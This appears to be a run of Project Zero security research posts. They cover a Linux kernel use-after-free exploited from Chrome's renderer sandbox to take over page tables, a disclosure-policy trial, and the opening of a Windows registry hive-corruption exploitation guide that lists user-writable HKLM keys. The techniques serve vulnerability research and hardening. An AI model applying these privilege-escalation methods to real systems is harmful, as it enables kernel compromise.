    4. copy_from_iter() needs to take enough time to allow me to increment a value in its stack frame.

    Selecting an OOB overwrite target

    Page tables have several nice properties here:

    • It is easy for me to cause allocation of as many page tables as I want.
    • I can easily determine the physical and kernel-virtual addresses of page tables that the kernel has allocated for my process (by walking the page tables with the arb read).
    • They are order-0 unmovable allocations, just like pipe buffers, so the page allocator will allocate them in the same 2MiB pageblocks.

    So I am choosing to use the OOB copy_from_user() to overwrite a page table.

    This requires that I can observe where my pipe buffer pages are located; for that, I again use the SLUB per-cpu freelist observing trick, this time on the kmalloc-cg-192 slab cache, to figure out where a newly created pipe's pipe_inode_info is located. From there, I can walk to the pipe's pipe_buffer array, which contains pointers to the pages used by the pipe.

With the ability to observe both where my page tables are located and where pipe buffer pages are allocated, I can alternately allocate page tables and pipe buffer pages until I get two that are adjacent.

    Detecting pipe_write() stack depth

    To run pipe_write() with a write() syscall such that I can reliably determine at which depth the function is running and decide whether to go ahead with the corruption, without having to race, I can prepare a pipe such that it initially only has space for one more pipe_buffer, and then call write() with a length of 0x3000. This will cause pipe_write() to first store 0x1000 bytes in the last free pipe_buffer slot, then wait for space to become available again. From another thread, it is possible to detect when pipe_write() has used the last free pipe_buffer slot by repeatedly calling poll() on the pipe: When poll() stops reporting that the pipe is ready for writing (POLLOUT), pipe_write() must have used up the last free pipe_buffer slot.

    At that point, I know that the syscall entry part of the kernel stack is no longer changing. To check whether the syscall is executing at a specific depth, it is enough to check whether the return address for the return from x64_sys_call to do_syscall_64 is at the expected position on the kernel stack using the arb read - it can't be a return address left from a preceding syscall because the same stack location where that return address is stored is always clobbered by a subsequent call to syscall_exit_to_user_mode at the end of a syscall.

If the stack randomization offset is the right one, I can then do more setup and resume pipe_write() by using read() to clear pipe buffer entries; otherwise, I will use read() to clear pipe buffer entries, let pipe_write() run to completion, and try again.

    Letting the reads in the increment primitive see the right data

    The increment primitive happens on this call graph:

unix_stream_recv_urg
  [read dangling pointer from ->oob_skb]
  unix_stream_read_actor [called as state->recv_actor]
    [UAF read UNIXCB(skb).consumed]
    skb_copy_datagram_msg
      skb_copy_datagram_iter
        __skb_datagram_iter
          skb_headlen
            [UAF read skb->len]
            [UAF read skb->data_len]
          skb_frags_readable
            [UAF read skb->unreadable]
          skb_shinfo [for reading nr_frags]
            skb_end_pointer
              [UAF read skb->head]
              [UAF read skb->end]
          skb_walk_frags
            skb_shinfo [for reading frag_list]
            [forward iteration starting at skb_shinfo(skb)->frag_list along ->next pointers]
  [UAF increment of UNIXCB(oob_skb).consumed]


    A promising aspect here is that this codepath first does all the reads; then it does a linked list walk through attacker-controlled pointers with skb_walk_frags(); and then it does the write. skb_walk_frags() is defined as follows:

#define skb_walk_frags(skb, iter)   \
    for (iter = skb_shinfo(skb)->frag_list; iter; iter = iter->next)


    and is used like this in __skb_datagram_iter():

    skb_walk_frags(skb, frag_iter) {
        int end;

        WARN_ON(start > offset + len);
        end = start + frag_iter->len;
        if ((copy = end - offset) > 0) {
            if (copy > len)
                copy = len;
            if (__skb_datagram_iter(frag_iter, offset - start,
                        to, copy, fault_short, cb, data))
                goto fault;
            if ((len -= copy) == 0)
                return 0;
            offset += copy;
        }
        start = end;
    }


    So if I run recv(..., MSG_OOB) on the UNIX domain socket while the dangling ->oob_skb pointer points to data I control, and craft that fake SKB such that its skb_shinfo(skb)->frag_list points to another fake SKB with ->len=0 and a ->next pointer pointing back to itself, I can cause the syscall to get stuck in an infinite loop. It will keep looping until I replace the ->next pointer with NULL, at which point it will perform just the UAF increment.

    This is great news: instead of needing to ensure that the stack contains the right data for the UAF reads and the overwrite target for the UAF increment at the same time, I can first place controlled data on the stack, and then afterwards separately place the overwrite target on the stack.

To place controlled data on the stack, I initially considered using select() or poll(), since I know that those syscalls copy large-ish amounts of data from userspace onto the stack; however, those have the disadvantage of immediately validating the supplied data, and it would be hard to make them actually stay in the syscall, rather than immediately returning out of the syscall with an error and often clobbering the on-stack data array in the process.

Eventually I discovered that sendmsg() on a datagram-oriented UNIX domain socket works great for this: ___sys_sendmsg(), which implements the sendmsg() syscall, will import the destination address pointed to by msg->msg_name into a stack buffer (struct sockaddr_storage address), then call into the protocol-specific ->sendmsg handler - in the case of datagram-oriented UNIX domain sockets, unix_dgram_sendmsg(). This function coarsely validates the structure of the destination address (checking that it specifies the AF_UNIX family and is no larger than struct sockaddr_un), then waits for space to become available in the socket's queue before doing anything else with the destination address. This makes it possible to place 108 bytes of controlled data on a kernel stack, and that data will stay there until the syscall can continue or bail out when space becomes available in the socket queue or the socket is shut down. I actually need a bit more data on the stack, but luckily the struct iovec iovstack[UIO_FASTIOV] is directly in front of the address, and unused elements at the end of the iovstack are guaranteed to be zeroed thanks to CONFIG_INIT_STACK_ALL_ZERO=y, which happens to be exactly what I need.

    It would be helpful to be able to reliably wait for the sendmsg() syscall to enter the kernel and copy the destination address onto the kernel stack before inspecting the state of its stack; this is luckily possible by supplying a single-byte "control message" via msg->msg_control and msg->msg_controllen, which will mostly be ignored because it is too small to be a legitimate control message, but will be copied onto the kernel stack in ____sys_sendmsg() after the destination address has been copied onto the stack. It is possible to detect from userspace when this kernel access to msg->msg_control happens by pointing it to a userspace address which is not yet populated with a page table entry, then polling mincore() on this userspace address.

    So now my strategy is roughly:

1. In a loop, call sendmsg() on the thread whose kernel stack the dangling ->oob_skb pointer points into, placing a fake SKB on that stack, until the fake SKB lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET; and have that fake SKB's skb_shinfo(skb)->frag_list point to a second fake SKB with a ->next pointer that refers back to itself. (This second fake SKB can be placed anywhere I want, so I'm putting it in a userspace-owned page, so that userspace can directly write into it.)
    2. On a second thread, use write() on a UNIX domain socket to use the dangling ->oob_skb pointer, which will start looping endlessly, following the ->next pointer.
    3. On the thread that called sendmsg() before, now call write(..., 0x3000) on a pipe with one free pipe_buffer slot in a loop until the syscall handler lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET.
    4. Let the pipe write() continue, and wait until it is in the middle of copying data from userspace memory to a pipe buffer page.
    5. Set the ->next pointer in the second fake SKB to NULL, so that the write() on the UNIX domain socket stops looping, performs the UAF increment, and returns.
    6. Wait for the pipe write() to finish, at which point the page table behind the pipe data page should have been overwritten with controlled data.

    Slowing down copy_from_iter()

    I need to slow down a copy_from_iter() call. There are several strategies for this that don't work (or don't work well) in a Chrome renderer sandbox:

• userfaultfd: not accessible in the Chrome Desktop renderer sandbox, and nowadays usually nerfed anyway, such that only root can use it to intercept usercopy operations
    • FUSE: not accessible in the Chrome Desktop renderer sandbox
    • causing lots of major page faults: I'm not sure if there is some indirect way to get a file descriptor to a writable on-disk file; but either way, this seems like it would be a pain from a renderer.

But as long as only a single userspace memory read needs to be delayed, there is another option: I can create a very large anonymous VMA; fill it with mappings of the 4KiB zeropage; ensure that no page is mapped at one specific location in the VMA (for example with madvise(..., MADV_DONTNEED), which zaps page table entries in the specified range); and then have one thread run an mprotect() operation on this large anonymous VMA while another thread tries to access the part of the userspace region where no page is currently mapped. The mprotect() operation will keep the VMA write-locked while it walks through all the associated page table entries, modifies the page table entries as required, and performs TLB flushes if necessary; so a concurrent page fault in this VMA will have to wait until the mprotect() has finished.

One limitation of this technique is that the part of the accessed userspace range that causes the slowdown will be filled with zeroes; but that can just be a single byte at the start or end of the range being copied, so it's not a major limitation.

    Based on some rough testing on my machine, if mprotect() has to iterate through 128 MiB of page tables populated with zeropage mappings, it takes something like 500-1000ms depending on which way the page table entries are changed.

    Page table control

    Putting all this together, I can overwrite the contents of a page table with controlled data. I'm using that controlled write to place a new entry in the page table that points back to the page table, effectively creating a userspace mapping of the page table; and then I can use this to map arbitrary kernel memory writably into userspace.

    My exploit demonstrates its ability to modify kernel memory with this by using it to overwrite the UTS information printed by uname.

    Takeaway: Chrome sandbox attack surface

    One thing that stood out to me about this is that I was able to use a somewhat large number of kernel interfaces in this exploit; in particular:

interface: usecase

• anonymous VMA creation: page table allocations
• madvise(): fast VMA splitting and merging
• AF_UNIX SOCK_STREAM sockets: triggering the bug; SKB allocation and freeing
• sched_getcpu() (via syscall-less fastpaths): interacting with per-cpu kernel structures
• eventfd(): synchronization between threads
• pipe(): allocation and freeing of order-0 unmovable pages with controlled contents
• pipe(): stack overwrite target
• AF_UNIX SOCK_DGRAM sockets: placing controlled data on the stack
• sendmsg(): placing controlled data on the stack
• mprotect(): slowing down copy_from_user()
• munmap(): TLB flushing
• madvise(..., MADV_DONTNEED): zapping PTEs for slowing down subsequent copy_from_user() or subsequently detecting copy_from_user()
• mincore(): detecting copy_from_user()
• clone(): racing operations on multiple threads; reallocating pages as kernel stack
• poll(): detecting progress of concurrent pipe_write()

    Some of these are obviously needed to implement necessary features of the sandboxed renderer; others seem like unnecessary attack surface. I hope to look at this more systematically in the future.

    Takeaway: Esoteric kernel features in core interfaces are an issue for browser sandboxes

One thing I've noticed, not just with this issue but with several issues before it, is that core kernel subsystems (which renderer sandbox policies and such expose) sometimes have flags that trigger esoteric ancillary features, and these end up unintentionally reachable from Chrome's renderer sandbox. Such features often seem to be more buggy than the core feature that the policy intended to expose. Examples of this from Chrome's past include:

    • futex() was broadly exposed in the sandbox, making it possible to reach a bug in Priority Inheritance futexes from the renderer sandbox.
    • memfd_create() was exposed in the sandbox without checking its flags, making it possible to create HugeTLB mappings using the MFD_HUGETLB flag. There have been several bugs in HugeTLB, which is to my knowledge almost exclusively used by some server applications that use large amounts of RAM, such as databases.
    • pipe2() was exposed in the sandbox without checking its flags, making it possible to create "notification pipes" using the O_NOTIFICATION_PIPE flag, which behave very differently from normal pipes and are used exclusively for posting notifications from the kernel "keys" subsystem to userspace.

    Takeaway: probabilistic mitigations against attackers with arbitrary read

When faced with an attacker who already has an arbitrary read primitive, probabilistic mitigations that randomize something differently on every operation can be ineffective, because the attacker can keep retrying until the arbitrary read confirms that the randomization picked a suitable value. They can even work to the attacker's advantage, by lining up memory locations that could otherwise never overlap, as done here using the kernel stack randomization feature.

    Picking per-syscall random stack offsets at boottime might avoid this issue, since to retry with different offsets, the attacker would have to wait for the machine to reboot or try again on another machine. However, that would break the protection for cases where the attacker wants to line up two syscalls that use the same syscall number (such as different ioctl() calls); and it could also weaken the protection in cases where the attacker just needs to know what the randomization offset for some syscall will be.

    Somewhat relatedly, Blindside demonstrated that this style of attack can be pulled off without a normal arbitrary read primitive, by “exploiting” a real kernel memory corruption bug during speculative execution in order to leak information needed for subsequently exploiting the same memory corruption bug for real.

    Takeaway: syzkaller fuzzing and complex data structures

    The first memory corruption bug described in this post was introduced in late June 2024, and discovered by syzkaller in late August 2024. Hitting that bug required 6 syscalls: One to set up a socket pair, four send()/recv() calls to set up a dangling pointer, and one more recv() call to actually trigger UAF by accessing the dangling pointer.

    Hitting the second memory corruption bug, which I found by code review, required 8 syscalls: One to set up a socket pair, six send()/recv() calls to set up a dangling pointer, and one more recv() to cause UAF.

    This was not a racy bug; in a KASAN build, running the buggy syscall sequence once would be enough to get a kernel splat. But when a fuzzer chains together syscalls more or less at random, the chance of running the right sequence of syscalls drops exponentially with each syscall required...

    The most important takeaway from this is that data structures with complex safety rules (in this case, rules about the ordering of different types of SKBs in the receive queues of UNIX domain stream sockets) don't just make it hard for human programmers to keep track of safety rules, they also make it hard for fuzzers to construct inputs that explore all relevant state patterns. This might be an area for fuzzer improvement - perhaps fuzzers could reach deeper into specific subsystems by generating samples that focus on interaction with a single kernel subsystem, or by monitoring whether additional syscalls chained to the end of a base sample cause additional activity in a particular subsystem.

    Takeaway: copy_from_user() delays don't require FUSE or userfaultfd

    FUSE and userfaultfd are the most effective and reliable ways to inject delays on copy_from_user() calls because they can set up separate delays for multiple memory regions, provide precise control over the timing of the injected delay, don't require large allocations or slow preparation, and allow placing arbitrary data in the page that is eventually installed. However, applying mprotect() to a large anonymous VMA filled with zeropage mappings (with 128 MiB of page tables) turns out to be sufficient to delay kernel execution by around a second. In the past, I have pushed for restricting userfaultfd because of how it can delay operations like copy_from_user(), but perhaps userfaultfd was not actually significantly more useful in this regard than mprotect().

    Takeaway: Usercopy hardening

    The hardening checks I encountered when calling copy_to_user() on arbitrary kernel addresses were a major annoyance, but could be worked around, since access to almost anything except type-specific SLUB pages is allowed. That said, I'm not sure how important improving these checks is - trying to protect against an attacker who can pass arbitrary kernel pointers to copy_to_user() might be futile, and guarding against out-of-bounds/use-after-free copy_to_user() or such is the major focus of this hardening.

    Conclusions

    Even in somewhat constrained environments, it is possible to pull off moderately complex Linux kernel exploits.

    Chrome's Linux desktop renderer sandbox exposes kernel attack surface that is never legitimately used in the sandbox. This needless functionality doesn’t just allow attackers to exercise vulnerabilities they otherwise couldn’t; it also exposes kernel interfaces that are useful for exploitation, enabling heap grooming, delay injection and more. The Linux kernel contributes to this issue by exposing esoteric features through the same syscalls as commonly-used core kernel functionality. I hope to do a more in-depth analysis of Chrome's renderer sandbox on Linux in a follow-up blogpost.


    Policy and Disclosure: 2025 Edition

    29 de Julho de 2025, 11:54

    Posted by Tim Willis, Google Project Zero

    In 2021, we updated our vulnerability disclosure policy to the current "90+30" model. Our goals were to drive faster yet thorough patch development, and improve patch adoption. While we’ve seen progress, a significant challenge remains: the time it takes for a fix to actually reach an end-user's device.

    This delay, often called the "patch gap," is a complex problem. Many consider the patch gap to be the time between a fix being released for a security vulnerability and the user installing the relevant update. However, our work has highlighted a critical, earlier delay: the "upstream patch gap". This is the period where an upstream vendor has a fix available, but downstream dependents, who are ultimately responsible for shipping fixes to users, haven’t yet integrated it into their end product.

    As Project Zero's recent work has focused on foundational, upstream technologies like chipsets and their drivers, we've observed that this upstream gap significantly extends the vulnerability lifecycle.

    For the end user, a vulnerability isn't fixed when a patch is released from Vendor A to Vendor B; it's only fixed when they download the update and install it on their device. To shorten that entire chain, we need to address the upstream delay.

    To address this, we're announcing a new trial policy: Reporting Transparency.

    The Trial: Reporting Transparency

    Our core 90-day disclosure deadline will remain in effect. However, we're adding a new step at the beginning of the process.

    Beginning today, within approximately one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered. We will share:

    • The vendor or open-source project that received the report.
    • The affected product.
    • The date the report was filed, and when the 90-day disclosure deadline expires.

    This trial maintains our existing 90+30 policy, meaning vendors still have 90 days to fix a bug before it is disclosed, with a 30-day period for patch adoption if the bug is fixed before the deadline.

    Google Big Sleep, a collaboration between Google DeepMind and Google Project Zero, will also be trialling this policy for their vulnerability reports. The issue tracker for Google Big Sleep is at goo.gle/bigsleep

    Why the Change? Increased Transparency to Close the Gap

The primary goal of this trial is to shrink the upstream patch gap by increasing transparency. By providing an early signal that a vulnerability has been reported upstream, we can better inform downstream dependents. For our small set of issues, these downstream dependents will have an additional source of information to monitor for issues that may affect their users.

    We hope that this trial will encourage the creation of stronger communication channels between upstream vendors and downstream dependents relating to security, leading to faster patches and improved patch adoption for end users.

    This data will make it easier for researchers and the public to track how long it takes for a fix to travel from the initial report, all the way to a user's device (which is especially important if the fix never arrives!)

    Will this help attackers?

No. We anticipate that in the initial phase of this trial, there may be increased public attention on unfixed bugs, but we want to be clear: no technical details, proof-of-concept code, or information that we believe would materially assist discovery will be released until the deadline. Reporting Transparency is an alert, not a blueprint for attackers.

    We understand that for some vendors without a downstream ecosystem, this policy may create unwelcome noise and attention for vulnerabilities that only they can address. However, these vendors now represent the minority of vulnerabilities reported by Project Zero. We believe the benefits of a fair, simple, consistent and transparent policy outweigh the risk of inconvenience to a small number of vendors.

    That said, in 2025, we hope that the industry consensus is that the mere existence of vulnerabilities in software is neither surprising nor alarming. End users are more aware of the importance of security updates than ever before. It's widely accepted as fact that any system of moderate complexity will have vulnerabilities, and systems that were considered impenetrable in the past have been shown to be vulnerable in retrospect.

    This is a trial, and we will be closely monitoring its effects. We hope it achieves our ultimate goal: a safer ecosystem where vulnerabilities are remediated not just in an upstream code repository, but on the devices, systems and services that people use every day. We look forward to sharing our findings and continuing to evolve our policies to meet the challenges of the ever-changing security landscape.


    The Windows Registry Adventure #8: Practical exploitation of hive memory corruption

    28 de Maio de 2025, 15:09

    Posted by Mateusz Jurczyk, Google Project Zero

    In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail.

    Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows):

    A diagram showing a corrupted memory cell overflowing an adjacent cell

    and temporal violations, such as use-after-free conditions:

    A diagram showing multiple invalid references to a freed cell

    In this write-up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.

    Where to start: high-level overview of potential options

    Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation.
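The determinism described above can be illustrated with a toy model. The sketch below is not the real HvAllocateCell logic, just a minimal first-fit free-list allocator with no randomization, showing why an identical sequence of operations always reproduces an identical cell layout:

```python
# Toy first-fit cell allocator with no randomization: the same sequence of
# operations always yields the same layout, mirroring why hive grooming is
# reproducible across machines. Illustrative model only, not HvAllocateCell.
class ToyCellAllocator:
    def __init__(self, size):
        self.free = [(0, size)]          # sorted list of (offset, length) holes

    def alloc(self, length):
        for i, (off, ln) in enumerate(self.free):
            if ln >= length:             # first fit, fully deterministic
                if ln == length:
                    del self.free[i]
                else:
                    self.free[i] = (off + length, ln - length)
                return off
        raise MemoryError

    def free_cell(self, off, length):
        self.free.append((off, length))  # no coalescing needed for the demo
        self.free.sort()

def layout(ops):
    """Replay a sequence of alloc/free operations, returning the offsets."""
    a = ToyCellAllocator(0x1000)
    out = []
    for op, arg in ops:
        if op == "alloc":
            out.append(a.alloc(arg))
        else:
            a.free_cell(*arg)
    return out

ops = [("alloc", 0x20), ("alloc", 0x40), ("free", (0, 0x20)), ("alloc", 0x10)]
# Two independent runs produce byte-identical layouts.
assert layout(ops) == layout(ops) == [0, 0x20, 0]
```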

    The exploitation of classic memory corruption bugs typically involves the following steps:

    1. Initial memory corruption primitive
    2. ???
    3. ???
    4. ???
    5. Profit (in the form of arbitrary code execution, privilege escalation, etc.)

    The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance:

    A flowchart depicting exploit development strategy, starting with "Memory corruption" which leads to "Information leak". This is followed by "Arbitrary vtable call", then "ROP" (Return-Oriented Programming). "ROP" leads to "Allocation of executable payload", which ultimately results in "Arbitrary code execution".

    In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation:

    A diagram showing a box labeled "Hive memory corruption" with an arrow pointing to a second box with a dashed outline and a question mark inside, indicating an unknown next step resulting from hive memory corruption.

    Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.

    Intra-hive corruption

    Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.

    Performing hive-only attacks in privileged system hives

    To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met:

    1. The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.
    2. The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug.

    Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell").

    Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this:

    • To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.
    • The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.
    • There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation.

    To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should ultimately be able to obtain a list of potential keys that can be used to corrupt a system hive.
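The two-phase approach above (enumerate everything as System, then re-test each path as an unprivileged user) can be sketched as follows. The registry API is abstracted into two callables so the logic can be demonstrated platform-neutrally; on a real Windows system these would wrap RegOpenKeyEx / RegEnumKeyEx (the mock tree and the key names in it are purely illustrative):

```python
# Sketch of the tooling described above: (1) walk every key path from a
# privileged vantage point, (2) re-test each path with the desired access
# rights from an unprivileged context. The registry is abstracted behind
# two callables; on Windows these would wrap RegEnumKeyEx / RegOpenKeyEx.
def walk_keys(root, enum_subkeys):
    """Yield every key path under root, depth-first."""
    stack = [root]
    while stack:
        path = stack.pop()
        yield path
        for sub in enum_subkeys(path):
            stack.append(path + "\\" + sub)

def find_writable(root, enum_subkeys, can_open_for_write):
    """Return the key paths an unprivileged caller can open for writing."""
    return [p for p in walk_keys(root, enum_subkeys) if can_open_for_write(p)]

# Demo against a mock registry tree with one overly permissive key.
tree = {
    "\\Registry\\Machine": ["SOFTWARE"],
    "\\Registry\\Machine\\SOFTWARE": ["Microsoft"],
    "\\Registry\\Machine\\SOFTWARE\\Microsoft": ["DRM", "Locked"],
    "\\Registry\\Machine\\SOFTWARE\\Microsoft\\DRM": [],
    "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Locked": [],
}
writable = {"\\Registry\\Machine\\SOFTWARE\\Microsoft\\DRM"}
hits = find_writable("\\Registry\\Machine",
                     lambda p: tree.get(p, []),
                     lambda p: p in writable)
assert hits == ["\\Registry\\Machine\\SOFTWARE\\Microsoft\\DRM"]
```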

    Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include:

    HKLM\SOFTWARE\Microsoft\CoreShell

    HKLM\SOFTWARE\Microsoft\DRM

    HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Shell\Oobe

    HKLM\SOFTWARE\Microsoft\Shell\Session

    HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys)

    HKLM\SOFTWARE\Microsoft\Windows\UpdateApi

    HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX

    HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM

    HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing

    HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys)

    HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation

    HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings

    HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval

    HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings

    As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind.

    Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023, but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to:

    • Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.
    • Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.
    • Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario.


    As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security.

    In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.

    Abusing regf inconsistency to trigger kernel pool corruption

    While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures.

    For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor in the pool through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.

